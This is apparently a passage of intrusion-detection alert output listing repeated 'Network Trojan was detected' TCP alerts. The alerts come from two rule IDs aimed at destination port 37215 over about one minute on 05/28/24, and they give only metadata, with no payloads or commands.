          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324121
          SID:2835222
          Source Port:56036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183402
          SID:2835222
          Source Port:33440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.557259
          SID:2829579
          Source Port:58036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681625
          SID:2835222
          Source Port:36150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051058
          SID:2829579
          Source Port:34058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.248613
          SID:2835222
          Source Port:53358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064398
          SID:2835222
          Source Port:59610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297453
          SID:2835222
          Source Port:33268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809215
          SID:2835222
          Source Port:60678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.243633
          SID:2829579
          Source Port:49966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202847
          SID:2835222
          Source Port:33112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465160
          SID:2829579
          Source Port:35362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177526
          SID:2835222
          Source Port:43348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.600841
          SID:2829579
          Source Port:35604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336090
          SID:2835222
          Source Port:48780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528066
          SID:2829579
          Source Port:56170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.602001
          SID:2829579
          Source Port:46402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.690073
          SID:2829579
          Source Port:55324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818594
          SID:2835222
          Source Port:45498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.039155
          SID:2829579
          Source Port:35252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327838
          SID:2829579
          Source Port:45250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466368
          SID:2835222
          Source Port:35300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528867
          SID:2829579
          Source Port:39006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154629
          SID:2835222
          Source Port:45982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923602
          SID:2829579
          Source Port:56792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.847829
          SID:2829579
          Source Port:59516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.215897
          SID:2835222
          Source Port:49992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176511
          SID:2829579
          Source Port:55238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.159728
          SID:2829579
          Source Port:39796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441915
          SID:2829579
          Source Port:56098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330135
          SID:2835222
          Source Port:59866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764629
          SID:2835222
          Source Port:56632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.422853
          SID:2835222
          Source Port:54332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147471
          SID:2835222
          Source Port:38006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154169
          SID:2829579
          Source Port:49678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877827
          SID:2829579
          Source Port:47316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770552
          SID:2835222
          Source Port:52674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778568
          SID:2829579
          Source Port:54996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.772730
          SID:2829579
          Source Port:38430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325307
          SID:2835222
          Source Port:60700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708351
          SID:2829579
          Source Port:48598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744115
          SID:2835222
          Source Port:44512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210657
          SID:2835222
          Source Port:50148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795118
          SID:2829579
          Source Port:47054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549525
          SID:2829579
          Source Port:58596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.021502
          SID:2835222
          Source Port:44868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322769
          SID:2829579
          Source Port:58796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.730168
          SID:2835222
          Source Port:48116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.990606
          SID:2829579
          Source Port:40584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591832
          SID:2835222
          Source Port:60202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.236893
          SID:2835222
          Source Port:45180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803207
          SID:2835222
          Source Port:39602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535710
          SID:2829579
          Source Port:40968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272818
          SID:2835222
          Source Port:47722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206941
          SID:2829579
          Source Port:39202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979056
          SID:2829579
          Source Port:40164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.355820
          SID:2829579
          Source Port:49880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232626
          SID:2835222
          Source Port:46924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537375
          SID:2829579
          Source Port:41248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405305
          SID:2835222
          Source Port:58974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770405
          SID:2829579
          Source Port:55640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265796
          SID:2829579
          Source Port:59468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.932789
          SID:2829579
          Source Port:40100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.471055
          SID:2829579
          Source Port:51212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.222569
          SID:2835222
          Source Port:55022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735772
          SID:2829579
          Source Port:52076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291713
          SID:2829579
          Source Port:36320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.224265
          SID:2835222
          Source Port:45042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146063
          SID:2829579
          Source Port:33122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102380
          SID:2829579
          Source Port:38692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941455
          SID:2835222
          Source Port:56356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727835
          SID:2835222
          Source Port:38722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681183
          SID:2835222
          Source Port:41412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.535907
          SID:2835222
          Source Port:46910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.135976
          SID:2835222
          Source Port:59470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146087
          SID:2835222
          Source Port:38250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326848
          SID:2829579
          Source Port:36036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.611397
          SID:2835222
          Source Port:42062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.215193
          SID:2835222
          Source Port:33404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.276309
          SID:2829579
          Source Port:48106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.238438
          SID:2829579
          Source Port:57774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722362
          SID:2829579
          Source Port:53924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.932743
          SID:2829579
          Source Port:48686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.681791
          SID:2829579
          Source Port:53632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105614
          SID:2829579
          Source Port:33910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.277620
          SID:2835222
          Source Port:49294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.305227
          SID:2829579
          Source Port:47046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336947
          SID:2829579
          Source Port:52984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147924
          SID:2835222
          Source Port:58788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891087
          SID:2829579
          Source Port:39176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042085
          SID:2829579
          Source Port:47590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.487987
          SID:2835222
          Source Port:56668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.145520
          SID:2829579
          Source Port:41402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878020
          SID:2835222
          Source Port:53466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652867
          SID:2829579
          Source Port:38528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774855
          SID:2835222
          Source Port:42854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183734
          SID:2835222
          Source Port:50768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711441
          SID:2829579
          Source Port:56598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401479
          SID:2835222
          Source Port:50088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977351
          SID:2835222
          Source Port:47972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598769
          SID:2829579
          Source Port:41090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042399
          SID:2829579
          Source Port:58616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962885
          SID:2835222
          Source Port:44256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793237
          SID:2829579
          Source Port:33534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299870
          SID:2835222
          Source Port:53998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.119213
          SID:2835222
          Source Port:58650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.308226
          SID:2835222
          Source Port:48176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.314571
          SID:2835222
          Source Port:39164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669255
          SID:2835222
          Source Port:38858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497260
          SID:2829579
          Source Port:50084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.610277
          SID:2835222
          Source Port:36744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202980
          SID:2829579
          Source Port:50156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977420
          SID:2835222
          Source Port:42416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.214095
          SID:2829579
          Source Port:52564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.751765
          SID:2835222
          Source Port:47014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796493
          SID:2835222
          Source Port:51458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.222517
          SID:2829579
          Source Port:56260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681604
          SID:2829579
          Source Port:52794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741460
          SID:2829579
          Source Port:45158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878857
          SID:2829579
          Source Port:57934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.379205
          SID:2829579
          Source Port:60476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322286
          SID:2835222
          Source Port:34210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939270
          SID:2835222
          Source Port:45846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272370
          SID:2835222
          Source Port:39920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.491279
          SID:2829579
          Source Port:42844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.994898
          SID:2829579
          Source Port:53450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561188
          SID:2829579
          Source Port:60618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548666
          SID:2829579
          Source Port:53770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.972182
          SID:2835222
          Source Port:43192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722044
          SID:2835222
          Source Port:57436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201387
          SID:2829579
          Source Port:35304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267078
          SID:2835222
          Source Port:33108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.736729
          SID:2835222
          Source Port:57380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401339
          SID:2835222
          Source Port:50984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221458
          SID:2835222
          Source Port:40762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322097
          SID:2829579
          Source Port:45850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225772
          SID:2835222
          Source Port:47424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.475387
          SID:2835222
          Source Port:43560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591535
          SID:2829579
          Source Port:57850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338511
          SID:2835222
          Source Port:38172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946909
          SID:2829579
          Source Port:49610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756369
          SID:2829579
          Source Port:43984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891118
          SID:2829579
          Source Port:48834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215930
          SID:2835222
          Source Port:43442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206264
          SID:2829579
          Source Port:46478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597726
          SID:2835222
          Source Port:46496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143119
          SID:2835222
          Source Port:37224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102763
          SID:2829579
          Source Port:37890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.804990
          SID:2835222
          Source Port:57220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.207042
          SID:2829579
          Source Port:42964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.553985
          SID:2835222
          Source Port:48962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116979
          SID:2835222
          Source Port:43764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.212641
          SID:2835222
          Source Port:55746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.239424
          SID:2829579
          Source Port:55088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562143
          SID:2829579
          Source Port:44560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295225
          SID:2829579
          Source Port:41874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.025709
          SID:2829579
          Source Port:38908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124453
          SID:2829579
          Source Port:51108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.595016
          SID:2829579
          Source Port:35566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269249
          SID:2835222
          Source Port:35614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322913
          SID:2835222
          Source Port:57496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739719
          SID:2835222
          Source Port:51694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973860
          SID:2829579
          Source Port:47608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.300057
          SID:2829579
          Source Port:43688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.486370
          SID:2829579
          Source Port:56866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.509559
          SID:2835222
          Source Port:57750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709323
          SID:2829579
          Source Port:51408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044542
          SID:2829579
          Source Port:41056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336520
          SID:2829579
          Source Port:47490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838590
          SID:2829579
          Source Port:36336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201407
          SID:2829579
          Source Port:46750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962298
          SID:2829579
          Source Port:46800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476197
          SID:2829579
          Source Port:36482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.923770
          SID:2835222
          Source Port:59454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.184063
          SID:2835222
          Source Port:51002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.470795
          SID:2829579
          Source Port:42500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.680133
          SID:2835222
          Source Port:52720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795227
          SID:2829579
          Source Port:48358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.865010
          SID:2835222
          Source Port:46550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.858861
          SID:2835222
          Source Port:57514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161800
          SID:2829579
          Source Port:47594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.914191
          SID:2835222
          Source Port:52832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141318
          SID:2835222
          Source Port:39514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.510328
          SID:2835222
          Source Port:33804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.488283
          SID:2829579
          Source Port:60166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.665376
          SID:2829579
          Source Port:53000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543536
          SID:2835222
          Source Port:47882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529971
          SID:2829579
          Source Port:38078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998651
          SID:2829579
          Source Port:34220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.746031
          SID:2835222
          Source Port:48584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338642
          SID:2835222
          Source Port:59060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114325
          SID:2829579
          Source Port:36752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849176
          SID:2835222
          Source Port:40362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.435604
          SID:2829579
          Source Port:37538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164834
          SID:2829579
          Source Port:51474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142588
          SID:2835222
          Source Port:54756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154607
          SID:2829579
          Source Port:43206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
